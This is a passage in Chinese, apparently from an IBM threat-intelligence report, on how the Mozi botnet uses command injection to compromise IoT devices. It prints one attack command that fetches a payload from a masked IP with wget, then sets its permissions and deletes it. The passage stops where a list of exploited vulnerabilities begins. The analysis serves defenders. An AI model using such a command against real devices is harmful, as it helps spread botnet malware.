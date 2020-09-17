在 IBM 观察到的几乎所有针对 IoT 的攻击中，攻击者都试图使用 CMDi 攻击来初始入侵设备。如果目标端点是 IoT 设备且易受此类攻击，恶意负载便会被下载并执行。

CMDi 攻击在 IoT 设备中极为普遍，原因有以下几点。首先， IoT 嵌入式系统通常包含 Web 界面和固件开发遗留的调试界面，这些都可能被利用。其次，IoT Web 界面内置的 PHP 模块可被利用，使恶意行为者获得远程执行能力。第三， IoT 界面在部署时常常处于脆弱状态，因为管理员未能通过清理预期远程输入来加固界面。这使得威胁行为者能够输入如“wget”之类的 shell 命令。

我们的分析显示，Mozi 僵尸网络通过使用“wget” shell 命令来利用 CMDi，然后修改权限以允许威胁行为者与受影响的系统交互。例如：

wget http://xxx.xx.xxx.xxx/bins/mozi.a-o /var/tmp/mozi.a;chmod 777 /var/tmp/mozi.a;rm -rf /var/tmp/mozi.a

若主机存在 CMDi 漏洞，此命令将下载并执行名为“mozi.a”的文件。我们对这一特定样本的分析表明，该文件可在无互锁流水线级微处理器 (MIPS) 架构上执行。这是运行精简指令集计算机 (RISC) 架构的机器所能理解的扩展，该架构在许多物联网设备中普遍存在。攻击者通过僵尸网络完全控制设备后，可更改固件层级并在设备上植入其他恶意软件。

尽管此示例引用的是已知攻击向量，但其持续有效主要基于两个原因。首先，新漏洞使得通过 CMDi 的攻击尝试能持续更新，而缓慢的补丁实施过程可被利用。其次，此类活动易于自动化，使威胁行为者能以低成本快速攻击大批设备。

Mozi 僵尸网络的基础设施似乎主要源自中国，占观测到的基础设施的 84%。这一事实与 2020 年其他关于物联网活动的开源研究结论相符。

以下是 IBM 观测到的 Mozi 僵尸网络尝试利用的漏洞列表：